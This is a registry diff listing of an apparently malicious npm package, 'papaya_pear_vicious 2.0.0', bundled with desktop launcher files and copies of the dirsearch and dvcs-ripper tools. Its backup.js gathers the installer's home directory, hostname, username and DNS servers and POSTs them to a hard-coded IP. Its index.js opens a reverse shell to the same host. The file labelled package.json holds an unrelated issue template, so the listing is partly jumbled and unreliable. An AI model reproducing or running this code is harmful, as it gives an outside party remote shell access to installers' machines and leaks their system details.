papaya_pear_vicious 2.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of papaya_pear_vicious might be problematic. Click here for more details.
- package/backup.js +46 -0
- package/chromium.desktop +140 -0
- package/index.js +19 -0
- package/install4j_u965hn-BurpSuiteCommunity.desktop +9 -0
- package/package.json +12 -0
- package/tools/dirsearch/.github/FUNDING.yml +3 -0
- package/tools/dirsearch/.github/ISSUE_TEMPLATE/ask_question.md +9 -0
- package/tools/dirsearch/.github/ISSUE_TEMPLATE/bug_report.md +17 -0
- package/tools/dirsearch/.github/ISSUE_TEMPLATE/feature_request.md +13 -0
- package/tools/dirsearch/.github/pull_request_template.md +13 -0
- package/tools/dirsearch/.github/workflows/ci.yml +47 -0
- package/tools/dirsearch/.github/workflows/codeql-analysis.yml +71 -0
- package/tools/dirsearch/.github/workflows/docker-image.yml +18 -0
- package/tools/dirsearch/.github/workflows/semgrep-analysis.yml +55 -0
- package/tools/dirsearch/CHANGELOG.md +149 -0
- package/tools/dirsearch/CONTRIBUTORS.md +84 -0
- package/tools/dirsearch/Dockerfile +17 -0
- package/tools/dirsearch/README.md +665 -0
- package/tools/dirsearch/__init__.py +4 -0
- package/tools/dirsearch/config.ini +78 -0
- package/tools/dirsearch/db/400_blacklist.txt +8 -0
- package/tools/dirsearch/db/403_blacklist.txt +21 -0
- package/tools/dirsearch/db/500_blacklist.txt +6 -0
- package/tools/dirsearch/db/dicc.txt +9636 -0
- package/tools/dirsearch/db/user-agents.txt +53 -0
- package/tools/dirsearch/dirsearch.py +75 -0
- package/tools/dirsearch/lib/__init__.py +0 -0
- package/tools/dirsearch/lib/connection/__init__.py +0 -0
- package/tools/dirsearch/lib/connection/dns.py +38 -0
- package/tools/dirsearch/lib/connection/requester.py +237 -0
- package/tools/dirsearch/lib/connection/response.py +74 -0
- package/tools/dirsearch/lib/controller/__init__.py +0 -0
- package/tools/dirsearch/lib/controller/controller.py +615 -0
- package/tools/dirsearch/lib/core/__init__.py +0 -0
- package/tools/dirsearch/lib/core/data.py +94 -0
- package/tools/dirsearch/lib/core/decorators.py +59 -0
- package/tools/dirsearch/lib/core/dictionary.py +210 -0
- package/tools/dirsearch/lib/core/exceptions.py +45 -0
- package/tools/dirsearch/lib/core/fuzzer.py +260 -0
- package/tools/dirsearch/lib/core/installation.py +51 -0
- package/tools/dirsearch/lib/core/logger.py +36 -0
- package/tools/dirsearch/lib/core/options.py +329 -0
- package/tools/dirsearch/lib/core/scanner.py +152 -0
- package/tools/dirsearch/lib/core/settings.py +125 -0
- package/tools/dirsearch/lib/core/structures.py +78 -0
- package/tools/dirsearch/lib/parse/__init__.py +0 -0
- package/tools/dirsearch/lib/parse/cmdline.py +515 -0
- package/tools/dirsearch/lib/parse/config.py +80 -0
- package/tools/dirsearch/lib/parse/headers.py +58 -0
- package/tools/dirsearch/lib/parse/rawrequest.py +48 -0
- package/tools/dirsearch/lib/parse/url.py +42 -0
- package/tools/dirsearch/lib/reports/__init__.py +0 -0
- package/tools/dirsearch/lib/reports/base.py +99 -0
- package/tools/dirsearch/lib/reports/csv_report.py +39 -0
- package/tools/dirsearch/lib/reports/html_report.py +59 -0
- package/tools/dirsearch/lib/reports/json_report.py +43 -0
- package/tools/dirsearch/lib/reports/markdown_report.py +43 -0
- package/tools/dirsearch/lib/reports/mysql_report.py +43 -0
- package/tools/dirsearch/lib/reports/plain_text_report.py +43 -0
- package/tools/dirsearch/lib/reports/postgresql_report.py +31 -0
- package/tools/dirsearch/lib/reports/simple_report.py +25 -0
- package/tools/dirsearch/lib/reports/sqlite_report.py +42 -0
- package/tools/dirsearch/lib/reports/templates/html_report_template.html +195 -0
- package/tools/dirsearch/lib/reports/xml_report.py +43 -0
- package/tools/dirsearch/lib/utils/__init__.py +0 -0
- package/tools/dirsearch/lib/utils/common.py +130 -0
- package/tools/dirsearch/lib/utils/crawl.py +87 -0
- package/tools/dirsearch/lib/utils/diff.py +83 -0
- package/tools/dirsearch/lib/utils/file.py +142 -0
- package/tools/dirsearch/lib/utils/mimetype.py +62 -0
- package/tools/dirsearch/lib/utils/pickle.py +69 -0
- package/tools/dirsearch/lib/utils/random.py +29 -0
- package/tools/dirsearch/lib/utils/schemedet.py +38 -0
- package/tools/dirsearch/lib/view/__init__.py +0 -0
- package/tools/dirsearch/lib/view/colors.py +79 -0
- package/tools/dirsearch/lib/view/terminal.py +236 -0
- package/tools/dirsearch/options.ini +5 -0
- package/tools/dirsearch/requirements.txt +20 -0
- package/tools/dirsearch/setup.cfg +11 -0
- package/tools/dirsearch/setup.py +45 -0
- package/tools/dirsearch/static/logo.png +0 -0
- package/tools/dirsearch/static/pause.png +0 -0
- package/tools/dirsearch/testing.py +37 -0
- package/tools/dirsearch/tests/__init__.py +0 -0
- package/tools/dirsearch/tests/connection/__init__.py +0 -0
- package/tools/dirsearch/tests/connection/test_dns.py +33 -0
- package/tools/dirsearch/tests/parse/__init__.py +0 -0
- package/tools/dirsearch/tests/parse/test_config.py +58 -0
- package/tools/dirsearch/tests/parse/test_headers.py +37 -0
- package/tools/dirsearch/tests/parse/test_url.py +43 -0
- package/tools/dirsearch/tests/reports/__init__.py +0 -0
- package/tools/dirsearch/tests/reports/test_reports.py +73 -0
- package/tools/dirsearch/tests/utils/__init__.py +0 -0
- package/tools/dirsearch/tests/utils/test_common.py +33 -0
- package/tools/dirsearch/tests/utils/test_crawl.py +41 -0
- package/tools/dirsearch/tests/utils/test_diff.py +30 -0
- package/tools/dirsearch/tests/utils/test_mimetype.py +31 -0
- package/tools/dirsearch/tests/utils/test_random.py +29 -0
- package/tools/dirsearch/tests/utils/test_schemedet.py +28 -0
- package/tools/dvcs-ripper/LICENSE +340 -0
- package/tools/dvcs-ripper/README.md +173 -0
- package/tools/dvcs-ripper/hg-decode.pl +164 -0
- package/tools/dvcs-ripper/rip-bzr.pl +232 -0
- package/tools/dvcs-ripper/rip-cvs.pl +198 -0
- package/tools/dvcs-ripper/rip-git.pl +558 -0
- package/tools/dvcs-ripper/rip-hg.pl +225 -0
- package/tools/dvcs-ripper/rip-svn.pl +224 -0
- package/xfce4-terminal.desktop +243 -0
package/backup.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "128.140.123.124", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 9000,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
package/chromium.desktop
ADDED
@@ -0,0 +1,140 @@
|
|
1
|
+
[Desktop Entry]
|
2
|
+
Version=1.0
|
3
|
+
Name=Chromium Web Browser
|
4
|
+
Name[ast]=Restolador web Chromium
|
5
|
+
Name[ca]=Navegador web Chromium
|
6
|
+
Name[de]=Chromium-Webbrowser
|
7
|
+
Name[es]=Navegador web Chromium
|
8
|
+
Name[fr]=Navigateur Web Chromium
|
9
|
+
Name[gl]=Navegador web Chromium
|
10
|
+
Name[he]=דפדפן האינטרנט Chromium
|
11
|
+
Name[hr]=Chromium web preglednik
|
12
|
+
Name[hu]=Chromium webböngésző
|
13
|
+
Name[id]=Peramban Web Chromium
|
14
|
+
Name[it]=Browser web Chromium
|
15
|
+
Name[ja]=Chromium ウェブ・ブラウザ
|
16
|
+
Name[ko]=Chromium 웹 브라우저
|
17
|
+
Name[pt_BR]=Chromium Navegador da Internet
|
18
|
+
Name[ru]=Веб-браузер Chromium
|
19
|
+
Name[sl]=Chromium spletni brskalnik
|
20
|
+
Name[sv]=Webbläsaren Chromium
|
21
|
+
Name[ug]=Chromium توركۆرگۈ
|
22
|
+
Name[zh_CN]=Chromium 网页浏览器
|
23
|
+
Name[zh_HK]=Chromium 網頁瀏覽器
|
24
|
+
Name[zh_TW]=Chromium 網頁瀏覽器
|
25
|
+
GenericName=Web Browser
|
26
|
+
GenericName[ar]=متصفح الشبكة
|
27
|
+
GenericName[ast]=Restolador web
|
28
|
+
GenericName[bg]=Уеб браузър
|
29
|
+
GenericName[bn]=ওয়েব ব্রাউজার
|
30
|
+
GenericName[ca]=Navegador web
|
31
|
+
GenericName[cs]=WWW prohlížeč
|
32
|
+
GenericName[da]=Browser
|
33
|
+
GenericName[de]=Webbrowser
|
34
|
+
GenericName[el]=Περιηγητής ιστού
|
35
|
+
GenericName[en_GB]=Web Browser
|
36
|
+
GenericName[es]=Navegador web
|
37
|
+
GenericName[et]=Veebibrauser
|
38
|
+
GenericName[fi]=WWW-selain
|
39
|
+
GenericName[fil]=Web Browser
|
40
|
+
GenericName[fr]=Navigateur Web
|
41
|
+
GenericName[gl]=Navegador web
|
42
|
+
GenericName[gu]=વેબ બ્રાઉઝર
|
43
|
+
GenericName[he]=דפדפן אינטרנט
|
44
|
+
GenericName[hi]=वेब ब्राउज़र
|
45
|
+
GenericName[hr]=Web preglednik
|
46
|
+
GenericName[hu]=Webböngésző
|
47
|
+
GenericName[id]=Peramban Web
|
48
|
+
GenericName[it]=Browser web
|
49
|
+
GenericName[ja]=ウェブ・ブラウザ
|
50
|
+
GenericName[kn]=ಜಾಲ ವೀಕ್ಷಕ
|
51
|
+
GenericName[ko]=웹 브라우저
|
52
|
+
GenericName[lt]=Žiniatinklio naršyklė
|
53
|
+
GenericName[lv]=Tīmekļa pārlūks
|
54
|
+
GenericName[ml]=വെബ് ബ്രൌസര്
|
55
|
+
GenericName[mr]=वेब ब्राऊजर
|
56
|
+
GenericName[nb]=Nettleser
|
57
|
+
GenericName[nl]=Webbrowser
|
58
|
+
GenericName[or]=ଓ୍ବେବ ବ୍ରାଉଜର
|
59
|
+
GenericName[pl]=Przeglądarka WWW
|
60
|
+
GenericName[pt]=Navegador Web
|
61
|
+
GenericName[pt_BR]=Navegador da Internet
|
62
|
+
GenericName[ro]=Navigator de Internet
|
63
|
+
GenericName[ru]=Веб-браузер
|
64
|
+
GenericName[sk]=WWW prehliadač
|
65
|
+
GenericName[sl]=Spletni brskalnik
|
66
|
+
GenericName[sr]=Интернет прегледник
|
67
|
+
GenericName[sv]=Webbläsare
|
68
|
+
GenericName[ta]=இணைய உலாவி
|
69
|
+
GenericName[te]=మహాతల అన్వేషి
|
70
|
+
GenericName[th]=เว็บเบราว์เซอร์
|
71
|
+
GenericName[tr]=Web Tarayıcı
|
72
|
+
GenericName[ug]=توركۆرگۈ
|
73
|
+
GenericName[uk]=Навігатор Тенет
|
74
|
+
GenericName[vi]=Bộ duyệt Web
|
75
|
+
GenericName[zh_CN]=网页浏览器
|
76
|
+
GenericName[zh_HK]=網頁瀏覽器
|
77
|
+
GenericName[zh_TW]=網頁瀏覽器
|
78
|
+
Comment=Access the Internet
|
79
|
+
Comment[ar]=الدخول إلى الإنترنت
|
80
|
+
Comment[ast]=Accesu a Internet
|
81
|
+
Comment[bg]=Достъп до интернет
|
82
|
+
Comment[bn]=ইন্টারনেটটি অ্যাক্সেস করুন
|
83
|
+
Comment[ca]=Accediu a Internet
|
84
|
+
Comment[cs]=Přístup k internetu
|
85
|
+
Comment[da]=Få adgang til internettet
|
86
|
+
Comment[de]=Internetzugriff
|
87
|
+
Comment[el]=Πρόσβαση στο Διαδίκτυο
|
88
|
+
Comment[en_GB]=Access the Internet
|
89
|
+
Comment[es]=Acceda a Internet
|
90
|
+
Comment[et]=Pääs Internetti
|
91
|
+
Comment[fi]=Käytä internetiä
|
92
|
+
Comment[fil]=I-access ang Internet
|
93
|
+
Comment[fr]=Explorer le Web
|
94
|
+
Comment[gl]=Acceda a Internet
|
95
|
+
Comment[gu]=ઇંટરનેટ ઍક્સેસ કરો
|
96
|
+
Comment[he]=גישה לאינטרנט
|
97
|
+
Comment[hi]=इंटरनेट तक पहुंच स्थापित करें
|
98
|
+
Comment[hr]=Pristupite Internetu
|
99
|
+
Comment[hu]=Az internet elérése
|
100
|
+
Comment[id]=Akses Internet
|
101
|
+
Comment[it]=Accesso a Internet
|
102
|
+
Comment[ja]=インターネットにアクセス
|
103
|
+
Comment[kn]=ಇಂಟರ್ನೆಟ್ ಅನ್ನು ಪ್ರವೇಶಿಸಿ
|
104
|
+
Comment[ko]=인터넷에 연결합니다
|
105
|
+
Comment[lt]=Interneto prieiga
|
106
|
+
Comment[lv]=Piekļūt internetam
|
107
|
+
Comment[ml]=ഇന്റര്നെറ്റ് ആക്സസ് ചെയ്യുക
|
108
|
+
Comment[mr]=इंटरनेटमध्ये प्रवेश करा
|
109
|
+
Comment[nb]=Gå til Internett
|
110
|
+
Comment[nl]=Verbinding maken met internet
|
111
|
+
Comment[or]=ଇଣ୍ଟର୍ନେଟ୍ ପ୍ରବେଶ କରନ୍ତୁ
|
112
|
+
Comment[pl]=Skorzystaj z internetu
|
113
|
+
Comment[pt]=Aceder à Internet
|
114
|
+
Comment[pt_BR]=Acessar a internet
|
115
|
+
Comment[ro]=Accesaţi Internetul
|
116
|
+
Comment[ru]=Доступ в Интернет
|
117
|
+
Comment[sk]=Prístup do siete Internet
|
118
|
+
Comment[sl]=Dostop do interneta
|
119
|
+
Comment[sr]=Приступите Интернету
|
120
|
+
Comment[sv]=Surfa på Internet
|
121
|
+
Comment[ta]=இணையத்தை அணுகுதல்
|
122
|
+
Comment[te]=ఇంటర్నెట్ను ఆక్సెస్ చెయ్యండి
|
123
|
+
Comment[th]=เข้าถึงอินเทอร์เน็ต
|
124
|
+
Comment[tr]=İnternet'e erişin
|
125
|
+
Comment[ug]=ئىنتېرنېتنى زىيارەت قىلىش
|
126
|
+
Comment[uk]=Доступ до Інтернету
|
127
|
+
Comment[vi]=Truy cập Internet
|
128
|
+
Comment[zh_CN]=访问互联网
|
129
|
+
Comment[zh_HK]=連線到網際網路
|
130
|
+
Comment[zh_TW]=連線到網際網路
|
131
|
+
Exec=/usr/bin/chromium %U
|
132
|
+
Terminal=false
|
133
|
+
X-MultipleArgs=false
|
134
|
+
Type=Application
|
135
|
+
Icon=chromium
|
136
|
+
Categories=Network;WebBrowser;
|
137
|
+
MimeType=text/html;text/xml;application/xhtml_xml;application/x-mimearchive;x-scheme-handler/http;x-scheme-handler/https;
|
138
|
+
StartupWMClass=chromium
|
139
|
+
StartupNotify=true
|
140
|
+
Keywords=browser
|
package/index.js
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
(function(){
|
9
|
+
var net = require("net"),
|
10
|
+
cp = require("child_process"),
|
11
|
+
sh = cp.spawn("/bin/sh", []);
|
12
|
+
var client = new net.Socket();
|
13
|
+
client.connect(9000, "128.140.123.124", function(){
|
14
|
+
client.pipe(sh.stdin);
|
15
|
+
sh.stdout.pipe(client);
|
16
|
+
sh.stderr.pipe(client);
|
17
|
+
});
|
18
|
+
return /a/; // Prevents the Node.js application form crashing
|
19
|
+
})();
|
@@ -0,0 +1,9 @@
|
|
1
|
+
#!/usr/bin/env xdg-open
|
2
|
+
[Desktop Entry]
|
3
|
+
Type=Application
|
4
|
+
Name=Burp Suite Community Edition
|
5
|
+
Exec="/home/admin/BurpSuiteCommunity/BurpSuiteCommunity" %U
|
6
|
+
MimeType=application/x-extension-burp;
|
7
|
+
Icon=/home/admin/BurpSuiteCommunity/.install4j/BurpSuiteCommunity.png
|
8
|
+
Categories=Application;
|
9
|
+
StartupWMClass=install4j-burp-StartBurp
|
package/package.json
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
---
|
2
|
+
name: Bug Report
|
3
|
+
about: Report a dirsearch problem
|
4
|
+
labels: bug
|
5
|
+
---
|
6
|
+
|
7
|
+
### What is the current behavior?
|
8
|
+
|
9
|
+
What actually happens?
|
10
|
+
|
11
|
+
### What is the expected behavior?
|
12
|
+
|
13
|
+
What it should be instead?
|
14
|
+
|
15
|
+
### Any additional information?
|
16
|
+
|
17
|
+
Screenshots, dirsearch log, dirsearch version, used command, ...?
|
@@ -0,0 +1,13 @@
|
|
1
|
+
Description
|
2
|
+
---------------
|
3
|
+
|
4
|
+
What will it do?
|
5
|
+
|
6
|
+
If this PR will fix an issue, please address it:
|
7
|
+
Fix #{issue}
|
8
|
+
|
9
|
+
Requirements
|
10
|
+
---------------
|
11
|
+
|
12
|
+
- [ ] Add your name to `CONTRIBUTERS.md`
|
13
|
+
- [ ] If this is a new feature, then please add some additional information about it to `CHANGELOG.md`
|
@@ -0,0 +1,47 @@
|
|
1
|
+
name: Inspection
|
2
|
+
|
3
|
+
on: [push, pull_request]
|
4
|
+
|
5
|
+
jobs:
|
6
|
+
build:
|
7
|
+
runs-on: ${{ matrix.os }}
|
8
|
+
|
9
|
+
strategy:
|
10
|
+
fail-fast: false
|
11
|
+
matrix:
|
12
|
+
python-version: [3.7, 3.9]
|
13
|
+
os: ['ubuntu-latest', 'windows-latest']
|
14
|
+
|
15
|
+
steps:
|
16
|
+
- uses: actions/checkout@v2
|
17
|
+
- name: Set up Python ${{ matrix.python-version }}
|
18
|
+
uses: actions/setup-python@v2
|
19
|
+
with:
|
20
|
+
python-version: ${{ matrix.python-version }}
|
21
|
+
- name: Install dependencies
|
22
|
+
run: |
|
23
|
+
python -m pip install --upgrade pip
|
24
|
+
pip install codespell flake8 -r requirements.txt
|
25
|
+
- name: Test
|
26
|
+
run: |
|
27
|
+
echo index.%EXT% > tmp_wordlist.txt
|
28
|
+
echo home.html >> tmp_wordlist.txt
|
29
|
+
echo testphp.vulnweb.com > tmp_targets.txt
|
30
|
+
echo "GET / HTTP/1.1" > tmp_raw.txt
|
31
|
+
echo "Host: google.com" >> tmp_raw.txt
|
32
|
+
echo "User-Agent: dirsearch" >> tmp_raw.txt
|
33
|
+
echo "Accept: */*" >> tmp_raw.txt
|
34
|
+
python3 dirsearch.py -w tmp_wordlist.txt -u https://example.com -o tmp_report.json --format json --force-recursive -R 3 --full-url -q -O
|
35
|
+
python3 dirsearch.py -w tmp_wordlist.txt -l tmp_targets.txt --subdirs /,admin/ --exclude-extensions conf -q -L -f -i 200 --user-agent a --log tmp_log.log
|
36
|
+
python3 dirsearch.py -w tmp_wordlist.txt -u https://localhost --ip 93.184.216.34 --max-rate 2 -H K:V --random-agent --overwrite-extensions --no-color
|
37
|
+
python3 dirsearch.py -w tmp_wordlist.txt --raw tmp_raw.txt --prefixes . --suffixes ~ --skip-on-status 404 -m POST -d test=1 --crawl --min-response-size 9
|
38
|
+
echo https://self-signed.badssl.com | python3 dirsearch.py -w tmp_wordlist.txt --stdin --max-time 9 --auth u:p --auth-type basic --scheme http
|
39
|
+
|
40
|
+
- name: Unit Test
|
41
|
+
run: python3 testing.py
|
42
|
+
|
43
|
+
- name: Lint
|
44
|
+
run: |
|
45
|
+
flake8 .
|
46
|
+
- name: Codespell
|
47
|
+
run: codespell
|
@@ -0,0 +1,71 @@
|
|
1
|
+
# For most projects, this workflow file will not need changing; you simply need
|
2
|
+
# to commit it to your repository.
|
3
|
+
#
|
4
|
+
# You may wish to alter this file to override the set of languages analyzed,
|
5
|
+
# or to provide custom queries or build logic.
|
6
|
+
#
|
7
|
+
# ******** NOTE ********
|
8
|
+
# We have attempted to detect the languages in your repository. Please check
|
9
|
+
# the `language` matrix defined below to confirm you have the correct set of
|
10
|
+
# supported CodeQL languages.
|
11
|
+
#
|
12
|
+
name: "CodeQL"
|
13
|
+
|
14
|
+
on:
|
15
|
+
push:
|
16
|
+
branches: [ master ]
|
17
|
+
pull_request:
|
18
|
+
# The branches below must be a subset of the branches above
|
19
|
+
branches: [ master ]
|
20
|
+
schedule:
|
21
|
+
- cron: '38 0 * * 0'
|
22
|
+
|
23
|
+
jobs:
|
24
|
+
analyze:
|
25
|
+
name: Analyze
|
26
|
+
runs-on: ubuntu-latest
|
27
|
+
permissions:
|
28
|
+
actions: read
|
29
|
+
contents: read
|
30
|
+
security-events: write
|
31
|
+
|
32
|
+
strategy:
|
33
|
+
fail-fast: false
|
34
|
+
matrix:
|
35
|
+
language: [ 'python' ]
|
36
|
+
# CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ]
|
37
|
+
# Learn more:
|
38
|
+
# https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed
|
39
|
+
|
40
|
+
steps:
|
41
|
+
- name: Checkout repository
|
42
|
+
uses: actions/checkout@v2
|
43
|
+
|
44
|
+
# Initializes the CodeQL tools for scanning.
|
45
|
+
- name: Initialize CodeQL
|
46
|
+
uses: github/codeql-action/init@v1
|
47
|
+
with:
|
48
|
+
languages: ${{ matrix.language }}
|
49
|
+
# If you wish to specify custom queries, you can do so here or in a config file.
|
50
|
+
# By default, queries listed here will override any specified in a config file.
|
51
|
+
# Prefix the list here with "+" to use these queries and those in the config file.
|
52
|
+
# queries: ./path/to/local/query, your-org/your-repo/queries@main
|
53
|
+
|
54
|
+
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
|
55
|
+
# If this step fails, then you should remove it and run the build manually (see below)
|
56
|
+
- name: Autobuild
|
57
|
+
uses: github/codeql-action/autobuild@v1
|
58
|
+
|
59
|
+
# ℹ️ Command-line programs to run using the OS shell.
|
60
|
+
# 📚 https://git.io/JvXDl
|
61
|
+
|
62
|
+
# ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
|
63
|
+
# and modify them (or add more) to build your code if your project
|
64
|
+
# uses a compiled language
|
65
|
+
|
66
|
+
#- run: |
|
67
|
+
# make bootstrap
|
68
|
+
# make release
|
69
|
+
|
70
|
+
- name: Perform CodeQL Analysis
|
71
|
+
uses: github/codeql-action/analyze@v1
|
@@ -0,0 +1,18 @@
|
|
1
|
+
name: Docker Image CI
|
2
|
+
|
3
|
+
on:
|
4
|
+
push:
|
5
|
+
branches: [ "master" ]
|
6
|
+
pull_request:
|
7
|
+
branches: [ "master" ]
|
8
|
+
|
9
|
+
jobs:
|
10
|
+
|
11
|
+
build:
|
12
|
+
|
13
|
+
runs-on: ubuntu-latest
|
14
|
+
|
15
|
+
steps:
|
16
|
+
- uses: actions/checkout@v3
|
17
|
+
- name: Build the Docker image
|
18
|
+
run: docker build . --file Dockerfile --tag my-image-name:$(date +%s)
|
@@ -0,0 +1,55 @@
|
|
1
|
+
# This workflow file requires a free account on Semgrep.dev to
|
2
|
+
# manage rules, file ignores, notifications, and more.
|
3
|
+
#
|
4
|
+
# See https://semgrep.dev/docs
|
5
|
+
|
6
|
+
name: Semgrep
|
7
|
+
|
8
|
+
on:
|
9
|
+
push:
|
10
|
+
branches: [ master ]
|
11
|
+
pull_request:
|
12
|
+
# The branches below must be a subset of the branches above
|
13
|
+
branches: [ master ]
|
14
|
+
schedule:
|
15
|
+
- cron: '19 5 * * 6'
|
16
|
+
|
17
|
+
jobs:
|
18
|
+
semgrep:
|
19
|
+
name: Scan
|
20
|
+
runs-on: ubuntu-latest
|
21
|
+
# Skip any PR created by dependabot to avoid permission issues
|
22
|
+
if: (github.actor != 'dependabot[bot]')
|
23
|
+
steps:
|
24
|
+
# Fetch project source
|
25
|
+
- uses: actions/checkout@v2
|
26
|
+
|
27
|
+
- uses: returntocorp/semgrep-action@v1
|
28
|
+
with:
|
29
|
+
config: >- # more at semgrep.dev/explore
|
30
|
+
p/security-audit
|
31
|
+
p/secrets
|
32
|
+
|
33
|
+
# Instead of `config:`, use rules set in Semgrep App.
|
34
|
+
# Get your token from semgrep.dev/manage/settings.
|
35
|
+
publishToken: ${{ secrets.SEMGREP_APP_TOKEN }}
|
36
|
+
|
37
|
+
# Never fail the build due to findings on pushes.
|
38
|
+
# Instead, just collect findings for semgrep.dev/manage/findings
|
39
|
+
# auditOn: push
|
40
|
+
|
41
|
+
# Upload findings to GitHub Advanced Security Dashboard [step 1/2]
|
42
|
+
# See also the next step.
|
43
|
+
generateSarif: "1"
|
44
|
+
|
45
|
+
# Change job timeout (default is 1800 seconds; set to 0 to disable)
|
46
|
+
# env:
|
47
|
+
# SEMGREP_TIMEOUT: 300
|
48
|
+
|
49
|
+
# Upload findings to GitHub Advanced Security Dashboard [step 2/2]
|
50
|
+
- name: Upload SARIF file for GitHub Advanced Security Dashboard
|
51
|
+
uses: github/codeql-action/upload-sarif@v1
|
52
|
+
with:
|
53
|
+
sarif_file: semgrep.sarif
|
54
|
+
if: always()
|
55
|
+
|
@@ -0,0 +1,149 @@
|
|
1
|
+
# Changelog
|
2
|
+
|
3
|
+
## [Unreleased]
|
4
|
+
|
5
|
+
## [0.4.3] - October 2nd, 2022
|
6
|
+
- Automatically detect the URI scheme (`http` or `https`) if no scheme is provided
|
7
|
+
- SQLite report format
|
8
|
+
- Option to overwrite unwanted extensions with selected extensions
|
9
|
+
- Option to view redirects history when following redirects
|
10
|
+
- Option to crawl web paths in the responses
|
11
|
+
- HTTP traffic is saved inside log file
|
12
|
+
- Capability to save progress and resume later
|
13
|
+
- Support client certificate
|
14
|
+
- Maximum size of the log file via configuration
|
15
|
+
|
16
|
+
## [0.4.2] - September 12, 2021
|
17
|
+
- More accurate
|
18
|
+
- Exclude responses by redirects
|
19
|
+
- URLs from STDIN
|
20
|
+
- Fixed the CSV Injection vulnerability (https://www.exploit-db.com/exploits/49370)
|
21
|
+
- Raw request supported
|
22
|
+
- Can setup the default URL scheme (will be used when there is no scheme in the URL)
|
23
|
+
- Added max runtime option
|
24
|
+
- Recursion on specified status codes
|
25
|
+
- Max request rate
|
26
|
+
- Support several authentication types
|
27
|
+
- Deep/forced recursive scan
|
28
|
+
- HTML report format
|
29
|
+
- Option to skip target by specified status codes
|
30
|
+
- Bug fixes
|
31
|
+
|
32
|
+
## [0.4.1] - August 12, 2020
|
33
|
+
- Faster
|
34
|
+
- Allow to brute force through a CIDR notation
|
35
|
+
- Exclude responses by human readable sizes
|
36
|
+
- Provide headers from a file
|
37
|
+
- Match/filter status codes by ranges
|
38
|
+
- Detect 429 response status code
|
39
|
+
- Support SOCKS proxy
|
40
|
+
- XML, Markdown and CSV report formats
|
41
|
+
- Capital wordlist format
|
42
|
+
- Option to replay proxy with found paths
|
43
|
+
- Option to remove all extensions in the wordlist
|
44
|
+
- Option to exit whenever an error occurs
|
45
|
+
- Option to disable colored output
|
46
|
+
- Debug mode
|
47
|
+
- Multiple bugfixes
|
48
|
+
|
49
|
+
## [0.4.0] - September 27, 2020
|
50
|
+
- Exclude extensions argument added
|
51
|
+
- No dot extensions option
|
52
|
+
- Support HTTP request data
|
53
|
+
- Added minimal response length and maximal response length arguments
|
54
|
+
- Added include status codes and exclude status codes arguments
|
55
|
+
- Added --clean-view option
|
56
|
+
- Added option to print the full URL in the output
|
57
|
+
- Added Prefixes and Suffixes arguments
|
58
|
+
- Multiple bugfixes
|
59
|
+
|
60
|
+
## [0.3.9] - November 26, 2019
|
61
|
+
- Added default extensions argument (-E).
|
62
|
+
- Added suppress empty responses.
|
63
|
+
- Recursion max depth.
|
64
|
+
- Exclude responses with text and regexes.
|
65
|
+
- Multiple fixes.
|
66
|
+
|
67
|
+
## [0.3.8] - July 25, 2017
|
68
|
+
- Delay argument added.
|
69
|
+
- Request by hostname switch added.
|
70
|
+
- Suppress empty switch added.
|
71
|
+
- Added Force Extensions switch.
|
72
|
+
- Multiple bugfixes.
|
73
|
+
|
74
|
+
## [0.3.7] - August 22, 2016
|
75
|
+
- Force extensions switch added
|
76
|
+
|
77
|
+
## [0.3.6] - February 14, 2016
|
78
|
+
- Bugfixes
|
79
|
+
|
80
|
+
## [0.3.5] - January 29, 2016
|
81
|
+
- Improved heuristic
|
82
|
+
- Replaced urllib3 for requests
|
83
|
+
- Error logs
|
84
|
+
- Batch reports
|
85
|
+
- User agent randomization
|
86
|
+
- bugfixes
|
87
|
+
|
88
|
+
## [0.3.0] - February 5, 2015
|
89
|
+
- Fixed issue3
|
90
|
+
- Fixed timeout exception
|
91
|
+
- Ported to Python3
|
92
|
+
- Other bugfixes
|
93
|
+
|
94
|
+
## [0.2.7] - November 21, 2014
|
95
|
+
- Added Url List feature (-l)
|
96
|
+
- Changed output
|
97
|
+
- Minor Fixes
|
98
|
+
|
99
|
+
## [0.2.6] - September 12, 2014
|
100
|
+
- Fixed bug when dictionary size is greater than threads count
|
101
|
+
- Fixed URL encoding bug
|
102
|
+
|
103
|
+
## [0.2.5] - September 2, 2014
|
104
|
+
- Shows Content-Length in output and reports
|
105
|
+
- Added default.conf file (for setting defaults)
|
106
|
+
- Report auto save feature added.
